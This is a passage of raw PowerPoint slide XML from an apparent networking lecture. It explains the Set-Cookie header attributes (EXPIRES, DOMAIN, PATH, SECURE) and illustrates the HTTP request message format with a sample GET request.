              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFC18AC-837E-496F-BE0A-3B40EEF463D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1600200"/>
            <a:ext cx="9144000" cy="4686300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" b="1"/>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; EXPIRES=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; PATH=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; DOMAIN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Domain_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; [SECURE]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name=Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>is the only specification that is not optional, allows you to assign a name to the value to be stored in the client</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXPIRES=Date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>Used to specify a date that defines the lifetime of the cookie. After this date, the cookie is automatically removed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>If not specified, the cookie is destroyed at the end of the user session when the browser is closed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOMAIN=Domain_Name Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>Used to identify the domain of the cookie. Only hosts within the specified domain can set the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>If the domain is not specified explicitly, is considered valid the server that generated the HTTP response.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"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1EEF43FF-4B17-485B-AA5F-28116BBA7404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>The HTTP message format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B13943-B722-489D-8CFB-6F626203EE0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800"/>
              <a:t>Two types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2800" i="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP request message:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A077EB4-C806-48D7-AB49-1FFF531DE24D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4448176" y="3444875"/>
            <a:ext cx="4955203"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2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /somedir/page.html HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.someschool.edu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-agent: Mozilla/4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: close </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Accept-language:fr </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(extra carriage return, line feed)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE225167-C50F-43BA-B894-FDC22FCA1305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1449387" y="3103563"/>
            <a:ext cx="2816226"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000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Request Command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>(GET, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>POST,  HEAD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B218D0-446E-48A9-962B-600EC3B242D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3756025" y="3463925"/>
            <a:ext cx="730250" cy="107950"/>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13319" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44A212C-080E-4F18-99B0-C73EF5D47E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4467226" y="3752851"/>
            <a:ext cx="227013" cy="1311275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 150"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 924"/>
              <a:gd name="T2" fmla="*/ 0 w 150"/>
              <a:gd name="T3" fmla="*/ 0 h 924"/>
              <a:gd name="T4" fmla="*/ 0 w 150"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 924"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 150"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 924"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 150"/>
              <a:gd name="T13" fmla="*/ 0 h 924"/>
              <a:gd name="T14" fmla="*/ 150 w 150"/>
              <a:gd name="T15" fmla="*/ 924 h 924"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="150" h="924">
                <a:moveTo>
                  <a:pt x="122" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="918"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="1905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it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0307CD44-57C7-4B81-9AAB-A9C55B4E887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3328989" y="4256088"/>
            <a:ext cx="1144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it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13321" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9FCCEE-1908-4CC7-A0C1-3D0B881031DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3686176" y="5324476"/>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13322" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D30BA7-1B50-4157-BF5F-5C557C0A6A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1885950" y="5208589"/>
            <a:ext cx="23685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000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>CR+LF tells end of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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DF78C3-DF68-4160-B8EC-EC17A9FB919F}"/>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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F3803F-10C3-4A17-A2CE-1A42DF88CCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1600200"/>
            <a:ext cx="9144000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" b="1"/>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; EXPIRES=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; PATH=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; DOMAIN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1"/>
              <a:t>Domain_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>; [SECURE]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PATH=Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>Used to specify the subset of the URL in the domain for which the cookie is valid. At the time of satisfying an HTTP request, if the cookie has already passed the check on the domain, then the pathname of the URL that is making the request is compared with this value. In case of equality the cookie is considered valid and is sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>Without specific path is assumed to be the same as described in the header of the document that contains the cookie</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SECURE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t>If this clause is added, then the cookie will be sent only if the communications channel with the host is secure (ie using some technique of secure transmission, for example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600" i="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1600"/>
              <a:t> protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CasellaDiTesto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99260BD-5BAD-4A64-AEBF-0A807C5E8CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2738438" y="5357814"/>
            <a:ext cx="6286500" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The cookies are identified by a combination of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
